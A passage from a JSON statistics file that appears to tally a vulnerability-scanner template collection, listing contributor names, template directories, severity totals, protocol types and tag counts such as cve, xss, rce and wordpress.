(@palaziv)","count":1},{"name":"petruknisme","count":1},{"name":"mubassirpatel","count":1},{"name":"ooooooo_q","count":1},{"name":"d0rkerdevil","count":1},{"name":"huowuzhao","count":1},{"name":"furkansenan","count":1},{"name":"thevillagehacker","count":1},{"name":"sy3omda","count":1},{"name":"0h1in9e","count":1},{"name":"kabirsuda","count":1},{"name":"bernardofsr","count":1},{"name":"flag007","count":1},{"name":"soyelmago","count":1},{"name":"exploitation","count":1},{"name":"toufik airane","count":1},{"name":"luci","count":1},{"name":"hanlaomo","count":1},{"name":"udyz","count":1},{"name":"thezakman","count":1},{"name":"b4uh0lz","count":1},{"name":"ahmed sherif","count":1},{"name":"chron0x","count":1},{"name":"ilovebinbash","count":1},{"name":"johnk3r","count":1},{"name":"_c0wb0y_","count":1},{"name":"alperenkesk","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"whynotke","count":1},{"name":"becivells","count":1},{"name":"jteles","count":1},{"name":"retr0","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"s1r1u5_","count":1},{"name":"affix","count":1},{"name":"0xteles","count":1},{"name":"co0nan","count":1},{"name":"juicypotato1","count":1},{"name":"streetofhackerr007","count":1},{"name":"yashanand155","count":1},{"name":"adrianmf","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"52971","count":1},{"name":"akshansh","count":1},{"name":"r3naissance","count":1},{"name":"deena","count":1},{"name":"ohlinge","count":1},{"name":"0xrod","count":1},{"name":"idealphase","count":1},{"name":"convisoappsec","count":1},{"name":"zandros0","count":1},{"name":"luskabol","count":1},{"name":"naglinagli","count":1},{"name":"0xtavian","count":1},{"name":"regala_","count":1},{"name":"absshax","count":1},{"name":"aresx","count":1},{"name":"zhenwarx","count":1},{"name":"sickwell","count":1},{"name":"andirrahmani1","count":1},{"name":"taielab","count":1},{"name":"ldionmarcil","count":1},{"name":"th3.d1p4k","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"daviey","count":1},{"name":"philippdelteil","count":1},{"name":"dawid czarnecki","count":1},{"name":"hakluke","count":1},{"name":"divya_mudgal","count":1},{"name":"shelld3v","count":1},{"name":"b0yd","count":1},{"name":"johnjhacking","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ringo","count":1},{"name":"shifacyclewla","count":1},{"name":"mah3sec_","count":1},{"name":"pdp","count":1},{"name":"mesaglio","count":1},{"name":"g4l1t0","count":1},{"name":"un-fmunozs","count":1},{"name":"yavolo","count":1},{"name":"omarkurt","count":1},{"name":"willd96","count":1},{"name":"elmahdi","count":1},{"name":"ipanda","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"noamrathaus","count":1},{"name":"rtcms","count":1},{"name":"alex","count":1},{"name":"defr0ggy","count":1},{"name":"infosecsanyam","count":1},{"name":"notsoevilweasel","count":1},{"name":"fmunozs","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"qlkwej","count":1},{"name":"yashgoti","count":1},{"name":"nytr0gen","count":1},{"name":"mhdsamx","count":1},{"name":"tim_koopmans","count":1},{"name":"rojanrijal","count":1},{"name":"iampritam","count":1},{"name":"its0x08","count":1},{"name":"sullo","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"abison_binoy","count":1},{"name":"pudsec","count":1},{"name":"remonsec","count":1},{"name":"_harleo","count":1},{"name":"sicksec","count":1},{"name":"bolli95","count":1},{"name":"knassar702","count":1},{"name":"ajaysenr","count":1},{"name":"0ut0fb4nd","count":1},{"name":"bad5ect0r","count":1},{"name":"kre80r","count":1},{"name":"bjhulst","count":1},{"name":"raesene","count":1},{"name":"sshell","count":1},{"name":"kurohost","count":1},{"name":"patralos","count":1},{"name":"elder tao","count":1},{"name":"c3l3si4n","count":1},{"name":"j33n1k4","count":1},{"name":"@dwisiswant0","count":1},{"name":"mass0ma","count":1},{"name":"smaranchand","count":1},{"name":"evolutionsec","count":1},{"name":"jeya seelan","count":1},{"name":"apt-mirror","count":1},{"name":"wabafet","count":1},{"name":"vzamanillo","count":1},{"name":"akash.c","count":1},{"name":"b0rn2r00t","count":1},{"name":"sec_hawk","count":1},{"name":"undefl0w","count":1},{"name":"andysvints","count":1},{"name":"blckraven","count":1},{"name":"gboddin","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"shreyapohekar","count":1}],"directory":[{"name":"cves","count":657},{"name":"vulnerabilities","count":284},{"name":"exposed-panels","count":235},{"name":"exposures","count":185},{"name":"technologies","count":164},{"name":"misconfiguration","count":125},{"name":"takeovers","count":71},{"name":"default-logins","count":52},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":30},{"name":"miscellaneous","count":28},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":610},{"name":"high","count":526},{"name":"medium","count":406},{"name":"critical","count":232},{"name":"low","count":160}],"types":[{"name":"http","count":1833},{"name":"file","count":46},{"name":"network","count":39},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":666},{"name":"panel","count":236},{"name":"lfi","count":228},{"name":"xss","count":225},{"name":"exposure","count":221},{"name":"wordpress","count":206},{"name":"rce","count":193},{"name":"cve2020","count":159},{"name":"wp-plugin","count":139},{"name":"cve2021","count":112},{"name":"tech","count":111},{"name":"config","count":93},{"name":"cve2019","count":90},{"name":"cve2018","count":80},{"name":"takeover","count":74},{"name":"apache","count":66},{"name":"","count":66},{"name":"token","count":64},{"name":"default-login","count":60},{"name":"joomla","count":59},{"name":"iot","count":58},{"name":"cve2010","count":51},{"name":"cve2017","count":49},{"name":"oob","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":39},{"name":"sqli","count":38},{"name":"ssrf","count":35},{"name":"cve2016","count":32},{"name":"oracle","count":31},{"name":"logs","count":30},{"name":"workflow","count":30},{"name":"jira","count":28},{"name":"redirect","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":20},{"name":"disclosure","count":20},{"name":"router","count":19},{"name":"aem","count":19},{"name":"generic","count":19},{"name":"cisco","count":19},{"name":"sap","count":18},{"name":"auth-bypass","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":15},{"name":"cve2012","count":14},{"name":"misconfig","count":14},{"name":"struts","count":13},{"name":"android","count":13},{"name":"cve2011","count":13},{"name":"adobe","count":13},{"name":"fuzz","count":13},{"name":"php","count":13},{"name":"devops","count":12},{"name":"weblogic","count":12},{"name":"jenkins","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"zoho","count":11},{"name":"cve2013","count":11},{"name":"ftp","count":9},{"name":"aws","count":9},{"name":"xxe","count":9},{"name":"magento","count":9},{"name":"cnvd","count":8},{"name":"login","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"backup","count":7},{"name":"cve2009","count":7},{"name":"kubernetes","count":7},{"name":"nginx","count":7},{"name":"netgear","count":7},{"name":"files","count":7},{"name":"vmware","count":7},{"name":"google","count":6},{"name":"cve2008","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"dell","count":6},{"name":"confluence","count":6},{"name":"laravel","count":6},{"name":"solr","count":6},{"name":"docker","count":6},{"name":"rconfig","count":6},{"name":"django","count":6},{"name":"api","count":6},{"name":"java","count":5},{"name":"ibm","count":5},{"name":"drupal","count":5},{"name":"lucee","count":5},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"fileupload","count":5},{"name":"wp-theme","count":5},{"name":"nodejs","count":5},{"name":"microsoft","count":5},{"name":"phpmyadmin","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"tomcat","count":4},{"name":"thinkphp","count":4},{"name":"exchange","count":4},{"name":"asp","count":4},{"name":"hp","count":4},{"name":"glpi","count":4},{"name":"thinkcmf","count":4},{"name":"magmi","count":4},{"name":"jolokia","count":4},{"name":"firmware","count":4},{"name":"elastic","count":4},{"name":"webserver","count":4},{"name":"vpn","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"wso2","count":4},{"name":"buffalo","count":4},{"name":"moodle","count":4},{"name":"grafana","count":4},{"name":"samsung","count":4},{"name":"traversal","count":4},{"name":"deserialization","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"targa","count":3},{"name":"bitrix","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"terramaster","count":3},{"name":"slack","count":3},{"name":"amazon","count":3},{"name":"tikiwiki","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"nacos","count":3},{"name":"zabbix","count":3},{"name":"springcloud","count":3},{"name":"httpd","count":3},{"name":"kevinlab","count":3},{"name":"vbulletin","count":3},{"name":"ssh","count":3},{"name":"caucho","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"r-seenet","count":3},{"name":"mongodb","count":3},{"name":"git","count":3},{"name":"itop","count":3},{"name":"intrusive","count":3},{"name":"opensis","count":3},{"name":"resin","count":3},{"name":"kafka","count":3},{"name":"nosqli","count":3},{"name":"lfr","count":3},{"name":"ebs","count":3},{"name":"fanruan","count":3},{"name":"microstrategy","count":3},{"name":"log","count":3},{"name":"ofbiz","count":3},{"name":"bypass","count":3},{"name":"cve2007","count":2},{"name":"sharepoint","count":2},{"name":"showdoc","count":2},{"name":"hjtcloud","count":2},{"name":"horde","count":2},{"name":"yapi","count":2},{"name":"prestashop","count":2},{"name":"github","count":2},{"name":"natshell","count":2},{"name":"linkerd","count":2},{"name":"chamilo","count":2},{"name":"dos","count":2},{"name":"npm","count":2},{"name":"emerge","count":2},{"name":"rstudio","count":2},{"name":"phpcollab","count":2},{"name":"strapi","count":2},{"name":"akamai","count":2},{"name":"spark","count":2},{"name":"shellshock","count":2},{"name":"smtp","count":2},{"name":"ucmdb","count":2},{"name":"splunk","count":2},{"name":"grav","count":2},{"name":"oauth","count":2},{"name":"rockethchat","count":2},{"name":"injection","count":2},{"name":"leak","count":2},{"name":"jellyfin","count":2},{"name":"saltstack","count":2},{"name":"sonicwall","count":2},{"name":"fortios","count":2},{"name":"igs","count":2},{"name":"prometheus","count":2},{"name":"trixbox","count":2},{"name":"glassfish","count":2},{"name":"node","count":2},{"name":"keycloak","count":2},{"name":"huawei","count":2},{"name":"hashicorp","count":2},{"name":"ec2","count":2},{"name":"jeedom","count":2},{"name":"paloalto","count":2},{"name":"openfire","count":2},{"name":"icewarp","count":2},{"name":"azure","count":2},{"name":"telerik","count":2},{"name":"mida","count":2},{"name":"middleware","count":2},{"name":"proxy","count":2},{"name":"hasura","count":2},{"name":"service","count":2},{"name":"plesk","count":2},{"name":"voipmonitor","count":2},{"name":"odoo","count":2},{"name":"couchdb","count":2},{"name":"waf","count":2},{"name":"flir","count":2},{"name":"mail","count":2},{"name":"jsf","count":2},{"name":"status","count":2},{"name":"chiyu","count":2},{"name":"xxljob","count":2},{"name":"wordfence","count":2},{"name":"sonarqube","count":2},{"name":"kentico","count":2},{"name":"netis","count":2},{"name":"hoteldruid","count":2},{"name":"maian","count":2},{"name":"seeyon","count":2},{"name":"cve2005","count":2},{"name":"activemq","count":2},{"name":"bigip","count":2},{"name":"axis2","count":2},{"name":"geowebserver","count":2},{"name":"frp","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"backdoor","count":2},{"name":"jboss","count":2},{"name":"nagios","count":2},{"name":"vrealize","count":2},{"name":"nextjs","count":2},{"name":"ecology","count":2},{"name":"webcam","count":2},{"name":"dolibarr","count":2},{"name":"smb","count":2},{"name":"kibana","count":2},{"name":"openam","count":2},{"name":"axis","count":2},{"name":"firebase","count":2},{"name":"idrac","count":2},{"name":"mcafee","count":2},{"name":"rockmongo","count":2},{"name":"globalprotect","count":2},{"name":"hpe","count":2},{"name":"cache","count":2},{"name":"guacamole","count":2},{"name":"akkadian","count":2},{"name":"pcoip","count":1},{"name":"webmodule-ee","count":1},{"name":"expn","count":1},{"name":"pagespeed","count":1},{"name":"alibaba","count":1},{"name":"centos","count":1},{"name":"bigbluebutton","count":1},{"name":"kubeflow","count":1},{"name":"landray","count":1},{"name":"clave","count":1},{"name":"kafdrop","count":1},{"name":"saltapi","count":1},{"name":"zarafa","count":1},{"name":"cve2006","count":1},{"name":"jfrog","count":1},{"name":"trilithic","count":1},{"name":"achecker","count":1},{"name":"tieline","count":1},{"name":"geddy","count":1},{"name":"graphite","count":1},{"name":"mantis","count":1},{"name":"springframework","count":1},{"name":"smartblog","count":1},{"name":"jnoj","count":1},{"name":"yachtcontrol","count":1},{"name":"clickhouse","count":1},{"name":"xunchi","count":1},{"name":"smartsense","count":1},{"name":"blue-ocean","count":1},{"name":"stem","count":1},{"name":"mirai","count":1},{"name":"sgp","count":1},{"name":"pgadmin","count":1},{"name":"hiawatha","count":1},{"name":"default","count":1},{"name":"gespage","count":1},{"name":"bedita","count":1},{"name":"vnc","count":1},{"name":"harbor","count":1},{"name":"webadmin","count":1},{"name":"haproxy","count":1},{"name":"opensmtpd","count":1},{"name":"upload","count":1},{"name":"wifisky","count":1},{"name":"nps","count":1},{"name":"tapestry","count":1},{"name":"socomec","count":1},{"name":"adb","count":1},{"name":"rsyncd","count":1},{"name":"blackboard","count":1},{"name":"servicedesk","count":1},{"name":"logontracer","count":1},{"name":"chevereto","count":1},{"name":"moin","count":1},{"name":"mobileiron","count":1},{"name":"b2evolution","count":1},{"name":"jsp","count":1},{"name":"fedora","count":1},{"name":"pacsone","count":1},{"name":"nordex","count":1},{"name":"empirecms","count":1},{"name":"mpsec","count":1},{"name":"qsan","count":1},{"name":"uwsgi","count":1},{"name":"prtg","count":1},{"name":"parentlink","count":1},{"name":"jquery","count":1},{"name":"wiki","count":1},{"name":"spidercontrol","count":1},{"name":"fortiweb","count":1},{"name":"csod","count":1},{"name":"db","count":1},{"name":"duomicms","count":1},{"name":"tongda","count":1},{"name":"tracer","count":1},{"name":"phpfusion","count":1},{"name":"gogs","count":1},{"name":"argussurveillance","count":1},{"name":"avalanche","count":1},{"name":"sentry","count":1},{"name":"acexy","count":1},{"name":"fortigates","count":1},{"name":"emby","count":1},{"name":"tjws","count":1},{"name":"beanshell","count":1},{"name":"dvwa","count":1},{"name":"linkedin","count":1},{"name":"ssl","count":1},{"name":"cacti","count":1},{"name":"expose","count":1},{"name":"tensorflow","count":1},{"name":"discourse","count":1},{"name":"processmaker","count":1},{"name":"ioncube","count":1},{"name":"panabit","count":1},{"name":"tamronos","count":1},{"name":"codeigniter","count":1},{"name":"flash","count":1},{"name":"azkaban","count":1},{"name":"bullwark","count":1},{"name":"ilo","count":1},{"name":"extractor","count":1},{"name":"vidyo","count":1},{"name":"simplecrm","count":1},{"name":"netdata","count":1},{"name":"openx","count":1},{"name":"svn","count":1},{"name":"goahead","count":1},{"name":"owasp","count":1},{"name":"razor","count":1},{"name":"panos","count":1},{"name":"commax","count":1},{"name":"qcubed","count":1},{"name":"metinfo","count":1},{"name":"csrf","count":1},{"name":"proftpd","count":1},{"name":"nuxeo","count":1},{"name":"sage","count":1},{"name":"grails","count":1},{"name":"synnefo","count":1},{"name":"fastapi","count":1},{"name":"totaljs","count":1},{"name":"tpshop","count":1},{"name":"wazuh","count":1},{"name":"aura","count":1},{"name":"solarlog","count":1},{"name":"netsweeper","count":1},{"name":"netgenie","count":1},{"name":"xiuno","count":1},{"name":"phpinfo","count":1},{"name":"octoprint","count":1},{"name":"rfi","count":1},{"name":"ruckus","count":1},{"name":"exacqvision","count":1},{"name":"soar","count":1},{"name":"ecom","count":1},{"name":"postgres","count":1},{"name":"trane","count":1},{"name":"xvr","count":1},{"name":"kyan","count":1},{"name":"monitorr","count":1},{"name":"alertmanager","count":1},{"name":"bazarr","count":1},{"name":"dotnet","count":1},{"name":"lutron","count":1},{"name":"ghost","count":1},{"name":"wavlink","count":1},{"name":"webui","count":1},{"name":"scs","count":1},{"name":"embedthis","count":1},{"name":"eyelock","count":1},{"name":"heroku","count":1},{"name":"rmi","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"livezilla","count":1},{"name":"optiLink","count":1},{"name":"dnssec","count":1},{"name":"chinaunicom","count":1},{"name":"nsasg","count":1},{"name":"aruba","count":1},{"name":"lighttpd","count":1},{"name":"qvisdvr","count":1},{"name":"jmx","count":1},{"name":"qdpm","count":1},{"name":"lotuscms","count":1},{"name":"javamelody","count":1},{"name":"hadoop","count":1},{"name":"resourcespace","count":1},{"name":"discord","count":1},{"name":"myucms","count":1},{"name":"opencast","count":1},{"name":"cves2016","count":1},{"name":"ambari","count":1},{"name":"moinmoin","count":1},{"name":"wooyun","count":1},{"name":"eyou","count":1},{"name":"pippoint","count":1},{"name":"rmc","count":1},{"name":"ueditor","count":1},{"name":"sidekiq","count":1},{"name":"eprints","count":1},{"name":"bitly","count":1},{"name":"circontrol","count":1},{"name":"kong","count":1},{"name":"aspnuke","count":1},{"name":"faraday","count":1},{"name":"getsimple","count":1},{"name":"sceditor","count":1},{"name":"iceflow","count":1},{"name":"huijietong","count":1},{"name":"zmanda","count":1},{"name":"tika","count":1},{"name":"addpac","count":1},{"name":"openerp","count":1},{"name":"cors","count":1},{"name":"lansweeper","count":1},{"name":"swagger","count":1},{"name":"servicenow","count":1},{"name":"wamp","count":1},{"name":"emc","count":1},{"name":"ricoh","count":1},{"name":"openstack","count":1},{"name":"office365","count":1},{"name":"dbeaver","count":1},{"name":"centreon","count":1},{"name":"jenkin","count":1},{"name":"commscope","count":1},{"name":"lanproxy","count":1},{"name":"avtech","count":1},{"name":"sangfor","count":1},{"name":"primetek","count":1},{"name":"k8s","count":1},{"name":"triconsole","count":1},{"name":"hiboss","count":1},{"name":"miscrsoft","count":1},{"name":"subrion","count":1},{"name":"payara","count":1},{"name":"druid","count":1},{"name":"wing-ftp","count":1},{"name":"gridx","count":1},{"name":"plastic","count":1},{"name":"ntopng","count":1},{"name":"appweb","count":1},{"name":"monitorix","count":1},{"name":"svnserve","count":1},{"name":"redwood","count":1},{"name":"websvn","count":1},{"name":"adminer","count":1},{"name":"skywalking","count":1},{"name":"cse","count":1},{"name":"ilo4","count":1},{"name":"camunda","count":1},{"name":"ems","count":1},{"name":"announcekit","count":1},{"name":"spip","count":1},{"name":"sourcebans","count":1},{"name":"wmt","count":1},{"name":"ewebs","count":1},{"name":"jenzabar","count":1},{"name":"memcached","count":1},{"name":"mysql","count":1},{"name":"lancom","count":1},{"name":"krweb","count":1},{"name":"blind","count":1},{"name":"xdcms","count":1},{"name":"arl","count":1},{"name":"wondercms","count":1},{"name":"webmin","count":1},{"name":"wildfly","count":1},{"name":"sar2html","count":1},{"name":"linksys","count":1},{"name":"iptime","count":1},{"name":"hortonworks","count":1},{"name":"perl","count":1},{"name":"exponentcms","count":1},{"name":"salesforce","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"gitlist","count":1},{"name":"tileserver","count":1},{"name":"turbocrm","count":1},{"name":"smi","count":1},{"name":"setup","count":1},{"name":"acontent","count":1},{"name":"craftcms","count":1},{"name":"mediumish","count":1},{"name":"robomongo","count":1},{"name":"magicflow","count":1},{"name":"clink-office","count":1},{"name":"openrestry","count":1},{"name":"plone","count":1},{"name":"landrayoa","count":1},{"name":"cocoon","count":1},{"name":"solman","count":1},{"name":"apiman","count":1},{"name":"keenetic","count":1},{"name":"zenario","count":1},{"name":"k8","count":1},{"name":"jitsi","count":1},{"name":"javascript","count":1},{"name":"timeclock","count":1},{"name":"opentsdb","count":1},{"name":"portainer","count":1},{"name":"ns","count":1},{"name":"viewpoint","count":1},{"name":"rabbitmq","count":1},{"name":"webftp","count":1},{"name":"phalcon","count":1},{"name":"dom","count":1},{"name":"diris","count":1},{"name":"xml","count":1},{"name":"opm","count":1},{"name":"expressjs","count":1},{"name":"biometrics","count":1},{"name":"ssltls","count":1},{"name":"sitecore","count":1},{"name":"upnp","count":1},{"name":"zeroshell","count":1},{"name":"kerbynet","count":1},{"name":"jeewms","count":1},{"name":"influxdb","count":1},{"name":"wuzhicms","count":1},{"name":"selea","count":1},{"name":"enumeration","count":1},{"name":"nexusdb","count":1},{"name":"comodo","count":1},{"name":"concrete","count":1},{"name":"visualtools","count":1},{"name":"auth","count":1},{"name":"mautic","count":1},{"name":"woocomernce","count":1},{"name":"nuuo","count":1},{"name":"cyberoam","count":1},{"name":"email","count":1},{"name":"sco","count":1},{"name":"anchorcms","count":1},{"name":"st","count":1},{"name":"erp-nc","count":1},{"name":"redis","count":1},{"name":" default-login","count":1},{"name":"dvr","count":1},{"name":"zyxel","count":1},{"name":"octobercms","count":1},{"name":"favicon","count":1},{"name":"owa","count":1},{"name":"spring","count":1},{"name":"tectuus","count":1},{"name":"checkpoint","count":1},{"name":"redhat","count":1},{"name":"bolt","count":1},{"name":"cherokee","count":1},{"name":"zend","count":1},{"name":"vsftpd","count":1},{"name":"klog","count":1},{"name":"nedi","count":1},{"name":"timesheet","count":1},{"name":"plc","count":1},{"name":"nweb2fax","count":1},{"name":"camera","count":1},{"name":"maccmsv10","count":1},{"name":"fastcgi","count":1},{"name":"crm","count":1},{"name":"sophos","count":1},{"name":"bash","count":1},{"name":"nc2","count":1},{"name":"clockwatch","count":1},{"name":"viewlinc","count":1},{"name":"yealink","count":1},{"name":"labtech","count":1},{"name":"zte","count":1},{"name":"ruby","count":1},{"name":"sarg","count":1},{"name":"floc","count":1},{"name":"fuelcms","count":1},{"name":"pyramid","count":1},{"name":"cobub","count":1},{"name":"wavemaker","count":1},{"name":"2014","count":1},{"name":"cerebro","count":1},{"name":"scimono","count":1},{"name":"cgi","count":1},{"name":"netmask","count":1},{"name":"dotnetnuke","count":1},{"name":"interlib","count":1},{"name":"apos","count":1},{"name":"mongo","count":1},{"name":"circontrorl","count":1},{"name":"rdp","count":1},{"name":"liferay","count":1},{"name":"fortigate","count":1},{"name":"traefik","count":1},{"name":"twitter-server","count":1},{"name":"shopware","count":1},{"name":"majordomo2","count":1},{"name":"zcms","count":1},{"name":"meraki","count":1},{"name":"feifeicms","count":1},{"name":"mantisbt","count":1},{"name":"openemr","count":1},{"name":"geutebruck","count":1},{"name":"mara","count":1},{"name":"xff","count":1},{"name":"doh","count":1},{"name":"idemia","count":1},{"name":"realteo","count":1},{"name":"fortinet","count":1},{"name":"episerver","count":1},{"name":"sprintful","count":1},{"name":"esmtp","count":1},{"name":"linux","count":1},{"name":"zookeeper","count":1},{"name":"bruteforce","count":1},{"name":"whm","count":1},{"name":"drone","count":1},{"name":"enum","count":1},{"name":"netrc","count":1},{"name":"glances","count":1},{"name":"javafaces","count":1},{"name":"zm","count":1},{"name":"mdb","count":1},{"name":"calendarix","count":1},{"name":"tensorboard","count":1},{"name":"finereport","count":1},{"name":"cofax","count":1},{"name":"couchbase","count":1},{"name":"dompdf","count":1},{"name":"phpunit","count":1},{"name":"seacms","count":1},{"name":"gloo","count":1},{"name":"bookstack","count":1},{"name":"rhymix","count":1},{"name":"rujjie","count":1},{"name":"dotclear","count":1},{"name":"gotmls","count":1},{"name":"mongoshake","count":1},{"name":"vsphere","count":1},{"name":"powercreator","count":1},{"name":"froxlor","count":1},{"name":"tenda","count":1},{"name":"lg-nas","count":1},{"name":"opensns","count":1},{"name":"pulsesecure","count":1},{"name":"flink","count":1},{"name":"cloudinary","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"postmessage","count":1},{"name":"weiphp","count":1},{"name":"sqlite","count":1},{"name":"codemeter","count":1},{"name":"vscode","count":1},{"name":"exposures","count":1},{"name":"visionhub","count":1},{"name":"h3c-imc","count":1},{"name":"oscommerce","count":1},{"name":"varnish","count":1},{"name":"nette","count":1},{"name":"thinkadmin","count":1},{"name":"htmli","count":1},{"name":"74cms","count":1},{"name":"darkstat","count":1},{"name":"ulterius","count":1},{"name":"spf","count":1},{"name":"mariadb","count":1},{"name":"gateone","count":1},{"name":"yii","count":1},{"name":"mailchimp","count":1},{"name":"clusterengine","count":1},{"name":"fiori","count":1},{"name":"szhe","count":1},{"name":"node-red-dashboard","count":1},{"name":"fortilogger","count":1},{"name":"alerta","count":1},{"name":"domxss","count":1},{"name":"spectracom","count":1},{"name":"oneblog","count":1},{"name":"shopxo","count":1},{"name":"nomad","count":1},{"name":"api-manager","count":1},{"name":"plugin","count":1},{"name":"manageengine","count":1},{"name":"acme","count":1},{"name":"cloudflare","count":1},{"name":"asus","count":1},{"name":"elascticsearch","count":1},{"name":"phpfastcache","count":1},{"name":"redcap","count":1},{"name":"accela","count":1},{"name":"sureline","count":1}],"authors":[{"name":"dhiyaneshdk","count":248},{"name":"pikpikcu","count":246},{"name":"pdteam","count":198},{"name":"daffainfo","count":183},{"name":"geeknik","count":150},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"pussycat0x","count":55},{"name":"princechaddha","count":55},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"0x_akoko","count":25},{"name":"organiccrap","count":24},{"name":"philippedelteil","count":21},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"nadino","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"meme-lord","count":6},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"xelkomy","count":4},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"z3bd","count":3},{"name":"lu4nx","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"fyoorer","count":3},{"name":"hahwul","count":2},{"name":"random-robbie","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"kiblyn11","count":2},{"name":"udit_thakkur","count":2},{"name":"pxmme1337","count":2},{"name":"unstabl3","count":2},{"name":"bp0lr","count":2},{"name":"foulenzer","count":2},{"name":"joeldeleep","count":2},{"name":"manas_harsh","count":2},{"name":"vavkamil","count":2},{"name":"socketz","count":2},{"name":"davidmckennirey","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"moritz nentwig","count":2},{"name":"parth","count":2},{"name":"g4l1t0","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"nkxxkn","count":2},{"name":"0xelkomy","count":2},{"name":"hetroublemakr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"arcc","count":2},{"name":"bsysop","count":2},{"name":"0xsapra","count":2},{"name":"x1m_martijn","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"koti2","count":2},{"name":"dheerajmadhukar","count":2},{"name":"huowuzhao","count":2},{"name":"0xcrypto","count":2},{"name":"swissky","count":2},{"name":"convisoappsec","count":2},{"name":"zomsop82","count":2},{"name":"gal nagli","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"afaq","count":2},{"name":"sushantkamble","count":2},{"name":"johnjhacking","count":2},{"name":"alifathi-h1","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xrudra","count":2},{"name":"0xprial","count":2},{"name":"randomrobbie","count":2},{"name":"c3l3si4n","count":1},{"name":"rtcms","count":1},{"name":"hakluke","count":1},{"name":"un-fmunozs","count":1},{"name":"skeltavik","count":1},{"name":"52971","count":1},{"name":"_darrenmartyn","count":1},{"name":"zandros0","count":1},{"name":"hanlaomo","count":1},{"name":"patralos","count":1},{"name":"revblock","count":1},{"name":"0xtavian","count":1},{"name":"rodnt","count":1},{"name":"abison_binoy","count":1},{"name":"s1r1u5_","count":1},{"name":"izn0u","count":1},{"name":"makyotox","count":1},{"name":"dawid-czarnecki","count":1},{"name":"borna nematzadeh","count":1},{"name":"sy3omda","count":1},{"name":"flag007","count":1},{"name":"pratik khalane","count":1},{"name":"j33n1k4","count":1},{"name":"mhdsamx","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"yavolo","count":1},{"name":"yashanand155","count":1},{"name":"elder 